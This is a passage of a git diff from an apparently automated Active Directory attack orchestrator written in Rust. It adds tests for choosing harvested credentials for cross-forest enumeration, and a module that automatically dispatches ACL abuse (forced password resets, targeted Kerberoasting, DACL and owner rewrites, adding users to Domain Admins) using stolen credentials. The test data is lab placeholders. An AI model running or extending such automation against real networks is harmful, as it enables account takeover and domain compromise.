+ let payload = serde_json::json!({ + "technique": "ldap_group_enumeration", + "target_ip": "192.168.58.20", + "domain": "fabrikam.local", + "resolve_foreign_principals": true, + "cross_forest": true, + }); + assert_eq!(payload["technique"], "ldap_group_enumeration"); + assert!(payload["resolve_foreign_principals"].as_bool().unwrap()); + } + + #[test] + fn coverage_threshold_values() { + // Module uses: known_user_count >= 5 || known_hash_count >= 10 + let known_user_count = 4; + let known_hash_count = 9; + assert!(known_user_count < 5 && known_hash_count < 10); // should trigger enum + + let known_user_count2 = 5; + assert!(known_user_count2 >= 5); // should skip + + let known_hash_count2 = 10; + assert!(known_hash_count2 >= 10); // should skip + } + + #[test] + fn under_enumerated_threshold() { + // is_under_enumerated = known_user_count < 3 + let counts = [0_usize, 2, 3, 5]; + assert!(counts[0] < 3); // 0 users = under-enumerated + assert!(counts[1] < 3); // 2 users = under-enumerated + assert!(counts[2] >= 3); // 3 users = not under-enumerated + } + + // --- collect_cross_forest_work tests --- + + fn make_cred( + id: &str, + user: &str, + pass: &str, + domain: &str, + admin: bool, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: id.into(), + username: user.into(), + password: pass.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: admin, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_hash(user: &str, domain: &str) -> ares_core::models::Hash { + ares_core::models::Hash { + id: format!("h-{user}"), + username: user.into(), + hash_value: "aad3b435b51404eeaad3b435b51404ee:deadbeef".into(), + hash_type: "ntlm".into(), + domain: domain.into(), + cracked_password: None, + source: "test".into(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + } + } + + #[tokio::test] + async fn collect_empty_state_no_work() { + let state = 
SharedState::new("test".into()); + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_single_domain_no_work() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.credentials.push(make_cred( + "c1", + "user1", + "P@ssw0rd!", + "contoso.local", + false, + )); // pragma: allowlist secret + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!(work.is_empty(), "single domain should produce no work"); + } + + #[tokio::test] + async fn collect_no_credentials_no_work() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!(work.is_empty(), "no credentials should produce no work"); + } + + #[tokio::test] + async fn collect_two_domains_with_cross_forest_cred() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + s.credentials + .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + // Should produce work for both domains (the cred works for contoso as same-domain, + // and for fabrikam as 
cross-forest). + assert!(!work.is_empty()); + // At least one item should target fabrikam + assert!(work.iter().any(|w| w.domain == "fabrikam.local")); + } + + #[tokio::test] + async fn collect_skips_domain_with_five_credentials() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // 5 credentials for fabrikam = already enumerated + for i in 0..5 { + s.credentials.push(make_cred( + &format!("c{i}"), + &format!("user{i}"), + "P@ssw0rd!", // pragma: allowlist secret + "fabrikam.local", + false, + )); + } + // Also need a cred that can authenticate + s.credentials + .push(make_cred("cx", "admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + // fabrikam should be skipped (>= 5 creds), contoso should appear + assert!( + work.iter().all(|w| w.domain != "fabrikam.local"), + "domain with >= 5 credentials should be skipped" + ); + } + + #[tokio::test] + async fn collect_skips_domain_with_ten_hashes() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // 10 hashes for fabrikam + for i in 0..10 { + s.hashes + .push(make_hash(&format!("hashuser{i}"), "fabrikam.local")); + } + s.credentials + .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!( + work.iter().all(|w| w.domain != "fabrikam.local"), + "domain with >= 10 hashes should be skipped" 
+ ); + } + + #[tokio::test] + async fn collect_credential_priority_same_domain_best() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Cross-forest cred (priority 3) + s.credentials.push(make_cred( + "c1", + "crossuser", + "P@ssw0rd!", + "contoso.local", + false, + )); // pragma: allowlist secret + // Same-domain cred (priority 0) — should be selected + s.credentials.push(make_cred( + "c2", + "localuser", + "P@ssw0rd!", + "fabrikam.local", + false, + )); // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some(), "should produce work for fabrikam"); + assert_eq!( + fab_work.unwrap().credential.username, + "localuser", + "same-domain credential should be preferred" + ); + } + + #[tokio::test] + async fn collect_credential_priority_admin_over_same_forest() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Same-forest non-admin (priority 2) + s.credentials.push(make_cred( + "c1", + "forestuser", + "P@ssw0rd!", + "child.fabrikam.local", + false, + )); // pragma: allowlist secret + // Admin from another domain (priority 1) — should win + s.credentials.push(make_cred( + "c2", + "adminuser", + "P@ssw0rd!", + "contoso.local", + true, + )); // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some()); + assert_eq!( + fab_work.unwrap().credential.username, + 
"adminuser", + "admin credential should be preferred over same-forest non-admin" + ); + } + + #[tokio::test] + async fn collect_credential_priority_same_forest_over_cross_forest() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Cross-forest non-admin (priority 3) + s.credentials.push(make_cred( + "c1", + "crossuser", + "P@ssw0rd!", + "contoso.local", + false, + )); // pragma: allowlist secret + // Same-forest non-admin (priority 2) — should win + s.credentials.push(make_cred( + "c2", + "forestuser", + "P@ssw0rd!", + "child.fabrikam.local", + false, + )); // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some()); + assert_eq!( + fab_work.unwrap().credential.username, + "forestuser", + "same-forest credential should be preferred over cross-forest" + ); + } + + #[tokio::test] + async fn collect_skips_quarantined_credentials() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Only credential is quarantined + s.credentials.push(make_cred( + "c1", + "baduser", + "P@ssw0rd!", + "contoso.local", + true, + )); // pragma: allowlist secret + s.quarantined_credentials.insert( + "baduser@contoso.local".into(), + chrono::Utc::now() + chrono::Duration::seconds(300), + ); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!( + work.iter().all(|w| w.credential.username != "baduser"), + "quarantined credentials should be skipped" + ); + } + + #[tokio::test] + async fn 
collect_skips_empty_password_credentials() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Only credential has empty password + s.credentials + .push(make_cred("c1", "nopass", "", "contoso.local", true)); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + // No usable credential → should produce no work for fabrikam + assert!( + work.iter().all(|w| w.domain != "fabrikam.local"), + "empty password credentials should not produce work" + ); + } + + #[tokio::test] + async fn collect_skips_already_processed_dedup_key() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + s.credentials + .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true)); // pragma: allowlist secret + // Pre-mark the dedup key as processed + let key = cross_forest_dedup_key("fabrikam.local", "admin", "contoso.local"); + s.mark_processed(DEDUP_CROSS_FOREST_ENUM, key); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!( + work.iter().all(|w| w.domain != "fabrikam.local"), + "already-processed dedup key should be skipped" + ); + } + + #[tokio::test] + async fn collect_under_enumerated_flag_when_few_users() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // 2 fabrikam creds (< 3 = under-enumerated) + s.credentials.push(make_cred( + "c1", + "user1", + "P@ssw0rd!", + "fabrikam.local", + false, + 
)); // pragma: allowlist secret + s.credentials.push(make_cred( + "c2", + "user2", + "P@ssw0rd!", + "fabrikam.local", + false, + )); // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some()); + assert!( + fab_work.unwrap().is_under_enumerated, + "domain with < 3 users should be marked under-enumerated" + ); + } + + #[tokio::test] + async fn collect_not_under_enumerated_with_three_users() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // 3 fabrikam creds (>= 3 = not under-enumerated, but < 5 so still triggers enum) + for i in 0..3 { + s.credentials.push(make_cred( + &format!("c{i}"), + &format!("user{i}"), + "P@ssw0rd!", // pragma: allowlist secret + "fabrikam.local", + false, + )); + } + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some()); + assert!( + !fab_work.unwrap().is_under_enumerated, + "domain with >= 3 users should not be marked under-enumerated" + ); + } +} diff --git a/ares-cli/src/orchestrator/automation/dacl_abuse.rs b/ares-cli/src/orchestrator/automation/dacl_abuse.rs new file mode 100644 index 00000000..dc0a64d1 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/dacl_abuse.rs @@ -0,0 +1,1000 @@ +//! auto_dacl_abuse -- direct ACL abuse for known attack paths. +//! +//! Unlike acl_chain_follow (which requires BloodHound to populate acl_chains), +//! this module proactively dispatches known ACL abuse techniques when: +//! - A credential is available for a user known to have dangerous permissions +//! - The target object exists in the domain +//! +//! 
Covers: ForceChangePassword, GenericWrite (targeted Kerberoast), WriteDacl,
+//! WriteOwner, GenericAll. Each abuse type maps to a specific tool invocation
+//! (e.g., net rpc password for ForceChangePassword, bloodyAD for GenericWrite).
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Dispatches ACL abuse when matching credentials + bloodhound paths exist.
+/// Interval: 30s.
+pub async fn auto_dacl_abuse(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(30));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("dacl_abuse") {
+            continue;
+        }
+
+        let work: Vec<DaclWork> = {
+            let state = dispatcher.state.read().await;
+            collect_dacl_work(&state)
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "dacl_abuse",
+                "acl_type": item.vuln_type,
+                "vuln_id": item.vuln_id,
+                "source_user": item.source_user,
+                "target_user": item.target_user,
+                "target_ip": item.dc_ip,
+                "domain": item.domain,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+
+            let priority = dispatcher.effective_priority("dacl_abuse");
+            match dispatcher
+                .throttled_submit("acl_chain_step", "acl", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        vuln_id = %item.vuln_id,
+                        acl_type = %item.vuln_type,
+                        source = %item.source_user,
+                        target = %item.target_user,
+                        "DACL abuse dispatched"
+                    );
+                    {
+                        let mut state = dispatcher.state.write().await;
+                        state.mark_processed(DEDUP_DACL_ABUSE, item.dedup_key.clone());
+                    }
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_DACL_ABUSE, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(vuln_id = %item.vuln_id, "DACL abuse deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, vuln_id = %item.vuln_id, "Failed to dispatch DACL abuse");
+                }
+            }
+        }
+    }
+}
+
+/// Collect DACL abuse work items from state without holding async locks.
+///
+/// Extracted for testability: scans `discovered_vulnerabilities` for ACL-type
+/// vulns that have a matching credential and haven't been processed yet.
+fn collect_dacl_work(state: &StateInner) -> Vec<DaclWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    // Check discovered_vulnerabilities for ACL-related vulns
+    // (populated by BloodHound analysis or recon agents)
+    for vuln in state.discovered_vulnerabilities.values() {
+        let vtype = vuln.vuln_type.to_lowercase();
+
+        let is_acl_vuln = vtype.contains("forcechangepassword")
+            || vtype.contains("genericwrite")
+            || vtype.contains("writedacl")
+            || vtype.contains("writeowner")
+            || vtype.contains("genericall")
+            || vtype.contains("self_membership")
+            || vtype.contains("write_membership");
+
+        if !is_acl_vuln {
+            continue;
+        }
+
+        if state.exploited_vulnerabilities.contains(&vuln.vuln_id) {
+            continue;
+        }
+
+        let dedup_key = format!("dacl:{}", vuln.vuln_id);
+        if state.is_processed(DEDUP_DACL_ABUSE, &dedup_key) {
+            continue;
+        }
+
+        // Extract source user from vuln details
+        let source_user = vuln
+            .details
+            .get("source")
+            .or_else(|| vuln.details.get("source_user"))
+            .or_else(|| vuln.details.get("from"))
+            .and_then(|v| v.as_str())
+            .unwrap_or("");
+
+        let source_domain = vuln
+            .details
+            .get("source_domain")
+            .or_else(|| vuln.details.get("domain"))
+            .and_then(|v| v.as_str())
+            .unwrap_or("");
+
+        if source_user.is_empty() {
+            continue;
+        }
+
+        // Find matching credential
+        let cred = state
+            .credentials
+            .iter()
+            .find(|c| {
+                c.username.to_lowercase() == source_user.to_lowercase()
&& (source_domain.is_empty() + || c.domain.to_lowercase() == source_domain.to_lowercase()) + }) + .cloned(); + + if let Some(cred) = cred { + let target_user = vuln + .details + .get("target") + .or_else(|| vuln.details.get("target_user")) + .or_else(|| vuln.details.get("to")) + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + + let dc_ip = state + .domain_controllers + .get(&cred.domain.to_lowercase()) + .cloned() + .unwrap_or_default(); + + items.push(DaclWork { + dedup_key, + vuln_id: vuln.vuln_id.clone(), + vuln_type: vtype, + source_user: source_user.to_string(), + target_user, + domain: cred.domain.clone(), + dc_ip, + credential: cred, + }); + } + } + + items +} + +struct DaclWork { + dedup_key: String, + vuln_id: String, + vuln_type: String, + source_user: String, + target_user: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("dacl:{}", "vuln-acl-001"); + assert_eq!(key, "dacl:vuln-acl-001"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_DACL_ABUSE, "dacl_abuse"); + } + + #[test] + fn acl_vuln_type_matching() { + let positives = [ + "ForceChangePassword", + "GenericWrite", + "WriteDacl", + "WriteOwner", + "GenericAll", + "self_membership", + "write_membership", + "SomePrefix_forcechangepassword_suffix", + ]; + for t in &positives { + let vtype = t.to_lowercase(); + let is_acl_vuln = vtype.contains("forcechangepassword") + || vtype.contains("genericwrite") + || vtype.contains("writedacl") + || vtype.contains("writeowner") + || vtype.contains("genericall") + || vtype.contains("self_membership") + || vtype.contains("write_membership"); + assert!(is_acl_vuln, "{t} should match as ACL vuln"); + } + } + + #[test] + fn non_acl_vuln_types_rejected() { + let negatives = [ + "smb_signing_disabled", + "mssql_access", + "zerologon", + "esc1", + "kerberoast", + ]; + for t in &negatives { + let vtype = 
t.to_lowercase(); + let is_acl_vuln = vtype.contains("forcechangepassword") + || vtype.contains("genericwrite") + || vtype.contains("writedacl") + || vtype.contains("writeowner") + || vtype.contains("genericall") + || vtype.contains("self_membership") + || vtype.contains("write_membership"); + assert!(!is_acl_vuln, "{t} should NOT match as ACL vuln"); + } + } + + #[test] + fn source_user_extraction_keys() { + // Verify the fallback chain for source user extraction + let details = serde_json::json!({ + "source": "admin", + "source_user": "admin2", + "from": "admin3", + }); + let source = details + .get("source") + .or_else(|| details.get("source_user")) + .or_else(|| details.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source, "admin"); + + // Fallback to source_user + let details2 = serde_json::json!({ + "source_user": "admin2", + }); + let source2 = details2 + .get("source") + .or_else(|| details2.get("source_user")) + .or_else(|| details2.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source2, "admin2"); + + // No source returns empty + let details3 = serde_json::json!({}); + let source3 = details3 + .get("source") + .or_else(|| details3.get("source_user")) + .or_else(|| details3.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source3, ""); + } + + #[test] + fn source_domain_extraction_keys() { + let details = serde_json::json!({"source_domain": "contoso.local"}); + let source_domain = details + .get("source_domain") + .or_else(|| details.get("domain")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source_domain, "contoso.local"); + + let details2 = serde_json::json!({"domain": "fabrikam.local"}); + let source_domain2 = details2 + .get("source_domain") + .or_else(|| details2.get("domain")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source_domain2, "fabrikam.local"); + + let details3 = serde_json::json!({}); + let source_domain3 = details3 + 
.get("source_domain") + .or_else(|| details3.get("domain")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source_domain3, ""); + } + + #[test] + fn target_user_extraction_keys() { + let details = serde_json::json!({"target": "victim", "target_user": "v2", "to": "v3"}); + let target = details + .get("target") + .or_else(|| details.get("target_user")) + .or_else(|| details.get("to")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(target, "victim"); + + let details2 = serde_json::json!({"target_user": "v2"}); + let target2 = details2 + .get("target") + .or_else(|| details2.get("target_user")) + .or_else(|| details2.get("to")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(target2, "v2"); + + let details3 = serde_json::json!({"to": "v3"}); + let target3 = details3 + .get("target") + .or_else(|| details3.get("target_user")) + .or_else(|| details3.get("to")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(target3, "v3"); + } + + #[test] + fn credential_matching_with_domain() { + let source_user = "admin"; + let source_domain = "contoso.local"; + let cred_username = "Admin"; + let cred_domain = "CONTOSO.LOCAL"; + + let matches = cred_username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || cred_domain.to_lowercase() == source_domain.to_lowercase()); + assert!(matches); + } + + #[test] + fn credential_matching_without_domain() { + let source_user = "admin"; + let source_domain = ""; + let cred_username = "admin"; + let cred_domain = "contoso.local"; + + let matches = cred_username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || cred_domain.to_lowercase() == source_domain.to_lowercase()); + assert!(matches); + } + + #[test] + fn credential_matching_wrong_user() { + let source_user = "admin"; + let source_domain = "contoso.local"; + let cred_username = "jdoe"; + let cred_domain = "contoso.local"; + + let matches = cred_username.to_lowercase() == 
source_user.to_lowercase() + && (source_domain.is_empty() + || cred_domain.to_lowercase() == source_domain.to_lowercase()); + assert!(!matches); + } + + #[test] + fn credential_matching_wrong_domain() { + let source_user = "admin"; + let source_domain = "contoso.local"; + let cred_username = "admin"; + let cred_domain = "fabrikam.local"; + + let matches = cred_username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || cred_domain.to_lowercase() == source_domain.to_lowercase()); + assert!(!matches); + } + + #[test] + fn dacl_payload_structure() { + let payload = serde_json::json!({ + "technique": "dacl_abuse", + "acl_type": "forcechangepassword", + "vuln_id": "vuln-acl-001", + "source_user": "admin", + "target_user": "victim", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "dacl_abuse"); + assert_eq!(payload["acl_type"], "forcechangepassword"); + assert_eq!(payload["source_user"], "admin"); + assert_eq!(payload["target_user"], "victim"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn acl_vuln_type_case_insensitive() { + for t in [ + "ForceChangePassword", + "FORCECHANGEPASSWORD", + "forcechangepassword", + ] { + let vtype = t.to_lowercase(); + assert!(vtype.contains("forcechangepassword"), "{t} should match"); + } + } + + #[test] + fn source_user_from_key() { + let details = serde_json::json!({"from": "svc_account"}); + let source = details + .get("source") + .or_else(|| details.get("source_user")) + .or_else(|| details.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source, "svc_account"); + } + + // -- collect_dacl_work integration tests -- + + use crate::orchestrator::state::SharedState; + use ares_core::models::{Credential, VulnerabilityInfo}; + use std::collections::HashMap; + + fn make_credential(username: &str, 
domain: &str) -> Credential {
+        Credential {
+            id: format!("cred-{username}"),
+            username: username.to_string(),
+            password: "P@ssw0rd!".to_string(), // pragma: allowlist secret
+            domain: domain.to_string(),
+            source: String::new(),
+            discovered_at: None,
+            is_admin: false,
+            parent_id: None,
+            attack_step: 0,
+        }
+    }
+
+    fn make_vuln(
+        vuln_id: &str,
+        vuln_type: &str,
+        details: HashMap<String, serde_json::Value>,
+    ) -> VulnerabilityInfo {
+        VulnerabilityInfo {
+            vuln_id: vuln_id.to_string(),
+            vuln_type: vuln_type.to_string(),
+            target: "192.168.58.10".to_string(),
+            discovered_by: "bloodhound".to_string(),
+            discovered_at: chrono::Utc::now(),
+            details,
+            recommended_agent: String::new(),
+            priority: 5,
+        }
+    }
+
+    fn acl_details(source: &str, target: &str, domain: &str) -> HashMap<String, serde_json::Value> {
+        let mut m = HashMap::new();
+        m.insert("source".to_string(), serde_json::json!(source));
+        m.insert("target".to_string(), serde_json::json!(target));
+        m.insert("source_domain".to_string(), serde_json::json!(domain));
+        m
+    }
+
+    #[tokio::test]
+    async fn collect_empty_state_no_work() {
+        let shared = SharedState::new("test".into());
+        let state = shared.read().await;
+        let work = collect_dacl_work(&state);
+        assert!(work.is_empty());
+    }
+
+    #[tokio::test]
+    async fn collect_no_credentials_no_work() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            let details = acl_details("admin", "victim", "contoso.local");
+            let vuln = make_vuln("vuln-001", "ForceChangePassword", details);
+            state
+                .discovered_vulnerabilities
+                .insert(vuln.vuln_id.clone(), vuln);
+        }
+        let state = shared.read().await;
+        let work = collect_dacl_work(&state);
+        assert!(work.is_empty());
+    }
+
+    #[tokio::test]
+    async fn collect_forcechangepassword_produces_work() {
+        let shared = SharedState::new("test".into());
+        {
+            let mut state = shared.write().await;
+            state
+                .credentials
+                .push(make_credential("admin", "contoso.local"));
+            let details = acl_details("admin", "victim",
"contoso.local"); + let vuln = make_vuln("vuln-fcp-001", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "forcechangepassword"); + assert_eq!(work[0].source_user, "admin"); + assert_eq!(work[0].target_user, "victim"); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[tokio::test] + async fn collect_genericwrite_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("svc_sql", "contoso.local")); + let details = acl_details("svc_sql", "targetuser", "contoso.local"); + let vuln = make_vuln("vuln-gw-001", "GenericWrite", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "genericwrite"); + } + + #[tokio::test] + async fn collect_writedacl_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("operator", "contoso.local")); + let details = acl_details("operator", "targetobj", "contoso.local"); + let vuln = make_vuln("vuln-wd-001", "WriteDacl", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "writedacl"); + } + + #[tokio::test] + async fn collect_writeowner_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("operator", "contoso.local")); + let details = acl_details("operator", "targetobj", "contoso.local"); 
+ let vuln = make_vuln("vuln-wo-001", "WriteOwner", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "writeowner"); + } + + #[tokio::test] + async fn collect_genericall_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-ga-001", "GenericAll", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "genericall"); + } + + #[tokio::test] + async fn collect_self_membership_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("user1", "contoso.local")); + let details = acl_details("user1", "Domain Admins", "contoso.local"); + let vuln = make_vuln("vuln-sm-001", "self_membership", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "self_membership"); + } + + #[tokio::test] + async fn collect_write_membership_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("user1", "contoso.local")); + let details = acl_details("user1", "Domain Admins", "contoso.local"); + let vuln = make_vuln("vuln-wm-001", "write_membership", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = 
shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "write_membership"); + } + + #[tokio::test] + async fn collect_non_acl_vuln_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "dc01", "contoso.local"); + let vuln = make_vuln("vuln-smb-001", "smb_signing_disabled", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_already_exploited_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-002", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + state + .exploited_vulnerabilities + .insert("vuln-fcp-002".to_string()); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_already_processed_dedup_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-003", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + state.mark_processed(DEDUP_DACL_ABUSE, "dacl:vuln-fcp-003".to_string()); + } + + let state = shared.read().await; + let work = 